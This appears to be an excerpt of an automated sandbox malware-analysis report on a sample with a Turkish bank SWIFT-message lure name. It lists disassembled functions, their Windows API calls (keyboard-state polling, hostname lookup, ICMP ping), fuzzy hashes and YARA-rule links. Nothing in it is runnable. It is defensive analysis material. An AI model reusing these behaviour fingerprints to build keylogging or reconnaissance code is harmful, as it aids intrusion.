Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 3a45e3907ad78d0edf18a9d7ff047d6d2ddfdb5345f64bcea6ce7fee4b012708
Instruction ID: 23182f05ae6cbc6206b04b8f9bf476e0b29ac7352cddaf0124cc0a4de68e64dc
Opcode Fuzzy Hash: 3a45e3907ad78d0edf18a9d7ff047d6d2ddfdb5345f64bcea6ce7fee4b012708
Instruction Fuzzy Hash: 74B1CC75A00209AFDB04DFA4D889EAEBBB9FF48314F148459F949EB251D770ED41CB60

Function 000C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000C2ED6
SetKeyboardState.USER32(?), ref: 000C2F41
GetAsyncKeyState.USER32(000000A0), ref: 000C2F61
GetKeyState.USER32(000000A0), ref: 000C2F78
GetAsyncKeyState.USER32(000000A1), ref: 000C2FA7
GetKeyState.USER32(000000A1), ref: 000C2FB8
GetAsyncKeyState.USER32(00000011), ref: 000C2FE4
GetKeyState.USER32(00000011), ref: 000C2FF2
GetAsyncKeyState.USER32(00000012), ref: 000C301B
GetKeyState.USER32(00000012), ref: 000C3029
GetAsyncKeyState.USER32(0000005B), ref: 000C3052
GetKeyState.USER32(0000005B), ref: 000C3060

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
Instruction ID: d222f25a6a731c1141f05e04457e253d0b7939a3a5c8f61c23119162f511fc5e
Opcode Fuzzy Hash: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
Instruction Fuzzy Hash: 0951E721A0478829FB75EBB48811FEEBFF45F11340F08859DD5C2565C3DA949B8CCBA2

Function 000BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 000BED1E
GetWindowRect.USER32(00000000,?), ref: 000BED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000BED8E
GetDlgItem.USER32(?,00000002), ref: 000BED99
GetWindowRect.USER32(00000000,?), ref: 000BEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000BEE01
GetDlgItem.USER32(?,000003E9), ref: 000BEE0F
GetWindowRect.USER32(00000000,?), ref: 000BEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000BEE63
GetDlgItem.USER32(?,000003EA), ref: 000BEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000BEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 000BEE9B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
Instruction ID: eb822706c771fda05c8d53910a44d2be3aa16abd404547272301c28df29a9aa4
Opcode Fuzzy Hash: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
Instruction Fuzzy Hash: 6A510FB1B00205AFDB18CFA9DD85AAEBBFAFB88700F148129F519D7291D7B1DD408B10

Function 0009B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009B72B), ref: 0009B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 0009B88D
DestroyAcceleratorTable.USER32(00000000), ref: 000FD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD90A
DeleteObject.GDI32(00000000), ref: 000FD91C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
Instruction ID: be7741a3a31942562ed4f614356e62d5413fa3194e3f7d52e7082ba2b7f0813a
Opcode Fuzzy Hash: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
Instruction Fuzzy Hash: 27619B30505604EFDB359F94EA88B7AB7F6FB85321F15451AE58686E70CBB0A8C0EB40

Function 0009B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537

GetSysColor.USER32(0000000F), ref: 0009B438

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
Instruction ID: 3bb84e45bae0859efe0909eef188d6f8d1a4a5a889ded72799144dd397a6d6f8
Opcode Fuzzy Hash: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
Instruction Fuzzy Hash: A4419330100144AFDF206F68ED89BB93BA6EB46731F144261FEA58E5E6D7708C81FB21

Function 000C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 000C6923
_wcscpy.LIBCMT ref: 000C6934
__wsplitpath.LIBCMT ref: 000C6958
__wsplitpath.LIBCMT ref: 000C6979
_wcscpy.LIBCMT ref: 000C699B
_wcscpy.LIBCMT ref: 000C69B9
_wcscpy.LIBCMT ref: 000C69C7
_wcscat.LIBCMT ref: 000C69D6
_wcscat.LIBCMT ref: 000C6A2B
_wcscat.LIBCMT ref: 000C6A61
_wcscat.LIBCMT ref: 000C6A73

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
Instruction ID: c8c5b851a6230d2866208f8a32bfb4a135d0ed6635da0e612ae49417fcd37b0c
Opcode Fuzzy Hash: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
Instruction Fuzzy Hash: 38414D7788521CAECF61EB90CC41DCF73BDEB44310F0041A6B649A2052EA31ABE98F51

Function 000CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0011DC00,0011DC00,0011DC00), ref: 000CD7CE
GetDriveTypeW.KERNEL32(?,00133A70), ref: 000CD898
_wcscpy.LIBCMT ref: 000CD8C2

Strings

unknown, xrefs: 000CD859
ramdisk, xrefs: 000CD842
all, xrefs: 000CD7D4
fixed, xrefs: 000CD816
network, xrefs: 000CD82C
cdrom, xrefs: 000CD7EA
removable, xrefs: 000CD800

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 11e6e2b36259338d5f2a5fe953548e3c2e5f8d8cdf38223fedad669da268a096
Instruction ID: 183e777bbe3cb6a8de8e027ed23dcb0a4c4bc629f8180a7c63c08eae186be6c7
Opcode Fuzzy Hash: 11e6e2b36259338d5f2a5fe953548e3c2e5f8d8cdf38223fedad669da268a096
Instruction Fuzzy Hash: 6F515C75104240AFD710EF14D891FAEB7A5FF84314F10892EF5AA972A2EB31DD09DB42

Function 0008936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000893AB
__itow.LIBCMT ref: 000893DF

Part of subcall function 000A1557: _xtow@16.LIBCMT ref: 000A1578

Strings

True, xrefs: 000F4C8C
False, xrefs: 000F4C93
0x%p, xrefs: 000F4CAD
%.15g, xrefs: 000893A5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
Instruction ID: b8f36424365730b95dbb406f9f95581dded283f297f807caaa27d29998e78eda
Opcode Fuzzy Hash: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
Instruction Fuzzy Hash: 6141E471504209ABEB64FB74D942EBA73F8FF49310F24446EE58AD7182EA319A41DB50

Function 000C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000C6F1D
gethostname.WSOCK32(?,00000100), ref: 000C6F37
gethostbyname.WSOCK32(?), ref: 000C6F44
_wcscpy.LIBCMT ref: 000C6F6C
inet_ntoa.WSOCK32(?), ref: 000C6F8A
_strcat.LIBCMT ref: 000C6F98
_wcscpy.LIBCMT ref: 000C6FAF
WSACleanup.WSOCK32 ref: 000C6FBD
_wcscpy.LIBCMT ref: 000C6FCB

Strings

0.0.0.0, xrefs: 000C6F66

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 748b189838eb71e30e5fc45f484393966c6be46bdcb30a745ecff4ae560d59bd
Instruction ID: 51f1ce9e0560a8d398ea55e9ecbfee576a9d93634738f95107d1abcc4f60bb78
Opcode Fuzzy Hash: 748b189838eb71e30e5fc45f484393966c6be46bdcb30a745ecff4ae560d59bd
Instruction Fuzzy Hash: E511D272904119ABCB35ABA0EC4AFDE77A8EB45710F0000BDF145A6082EFB19A828A50

Function 000A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A5047

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__gmtime64_s.LIBCMT ref: 000A50E0
__gmtime64_s.LIBCMT ref: 000A5116
__gmtime64_s.LIBCMT ref: 000A5133
__allrem.LIBCMT ref: 000A5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51A5
__allrem.LIBCMT ref: 000A51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51DA
__allrem.LIBCMT ref: 000A51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A520F
__invoke_watson.LIBCMT ref: 000A5280

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: d125b0fba58530c81b954585d4637ca03f1f8229af39adfbd2039819f9a3bb60
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 5671D772A00F16ABE7149EB8CC91BEA73E8BF16765F144229F514DB682E770DD408BD0

Function 000C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C4DF8
GetMenuItemInfoW.USER32(00141708,000000FF,00000000,00000030), ref: 000C4E59
SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C4E8F
Sleep.KERNEL32(000001F4), ref: 000C4EA1
GetMenuItemCount.USER32(?), ref: 000C4EE5
GetMenuItemID.USER32(?,00000000), ref: 000C4F01
GetMenuItemID.USER32(?,-00000001), ref: 000C4F2B
GetMenuItemID.USER32(?,?), ref: 000C4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FEB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
Instruction ID: 12ce594e23e06752c53e2cd0ac4ce4032a39b3dab337192585011b4c1a4b39df
Opcode Fuzzy Hash: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
Instruction Fuzzy Hash: E5616975900249AFEB21CFA4DC98EAE7BF8BB45308F14006DF841A7291D771AD86CB21

Function 000C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000C2B5F
GetAsyncKeyState.USER32(000000A0), ref: 000C2BE0
GetKeyState.USER32(000000A0), ref: 000C2BFB
GetAsyncKeyState.USER32(000000A1), ref: 000C2C15
GetKeyState.USER32(000000A1), ref: 000C2C2A
GetAsyncKeyState.USER32(00000011), ref: 000C2C42
GetKeyState.USER32(00000011), ref: 000C2C54
GetAsyncKeyState.USER32(00000012), ref: 000C2C6C
GetKeyState.USER32(00000012), ref: 000C2C7E
GetAsyncKeyState.USER32(0000005B), ref: 000C2C96
GetKeyState.USER32(0000005B), ref: 000C2CA8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
Instruction ID: 5a832d20bec3e645a43513bd39c1438acfc43ee563b877ffcc40cea664a542a9
Opcode Fuzzy Hash: 152d1c2d5ff6c710c82cff90c2bf10f8a7bc5eaa11add3dcae56f020ab4ade64
Instruction Fuzzy Hash: CC41D4305047C96EFFB4AB608844BADBEE06B11304F04805DD9C656AC2DBE49DC8C7A2

Function 000B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000B94FE
SafeArrayAllocData.OLEAUT32(?), ref: 000B9549
VariantInit.OLEAUT32(?), ref: 000B955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 000B957B
VariantCopy.OLEAUT32(?,?), ref: 000B95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 000B95D2
VariantClear.OLEAUT32(?), ref: 000B95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 000B95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B95FD
VariantClear.OLEAUT32(?), ref: 000B960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B961A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bd8e7501afcd0a5d7786d452c9bdb6f903066143bf60100ee8bb4fff87d637b9
Instruction ID: a9ab57291062fa7cebb7e3ccb951181ae967331a12e402ecafd64a1f8aeb17ba
Opcode Fuzzy Hash: bd8e7501afcd0a5d7786d452c9bdb6f903066143bf60100ee8bb4fff87d637b9
Instruction Fuzzy Hash: 70412C75A00219AFCB01EFE4D8849DEBBB9FF48354F008065E552E3661DB71EA85CBA1

Function 000DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CoInitialize.OLE32 ref: 000DADF6
CoUninitialize.OLE32 ref: 000DAE01
CoCreateInstance.OLE32(?,00000000,00000017,0010D8FC,?), ref: 000DAE61
IIDFromString.OLE32(?,?), ref: 000DAED4
VariantInit.OLEAUT32(?), ref: 000DAF6E
VariantClear.OLEAUT32(?), ref: 000DAFCF

Strings

Failed to create object, xrefs: 000DAE6C, 000DAF22
NULL Pointer assignment, xrefs: 000DAEA6
Invalid parameter, xrefs: 000DAEED

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 1cc60275c4978bd20d6480d6ce8d9bd495b1713e4ee9fa94fba76645c8c9c061
Instruction ID: 6294ee24b858aa8f11bfad1805de81332f086669c7ae11c0c10017290073ffbf
Opcode Fuzzy Hash: 1cc60275c4978bd20d6480d6ce8d9bd495b1713e4ee9fa94fba76645c8c9c061
Instruction Fuzzy Hash: F5619D71308301AFC720EF94D844BAEB7E8AF4A714F14455AF9859B292C770ED44CBA3

Function 000D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000D8168
inet_addr.WSOCK32(?), ref: 000D81AD
gethostbyname.WSOCK32(?), ref: 000D81B9
IcmpCreateFile.IPHLPAPI ref: 000D81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000D824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 000D82C2
WSACleanup.WSOCK32 ref: 000D82C8

Strings

Ping, xrefs: 000D81EB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
Instruction ID: 5eae82f924270f6271a24edffedb04dc0d7d4e1c73f6ab894aeb740a4116576c
Opcode Fuzzy Hash: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
Instruction Fuzzy Hash: BA51BE31604700AFDB20EF64DC45B6AB7E4BF48320F04896AF999DB3A1DB70E941DB52

Function 000CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

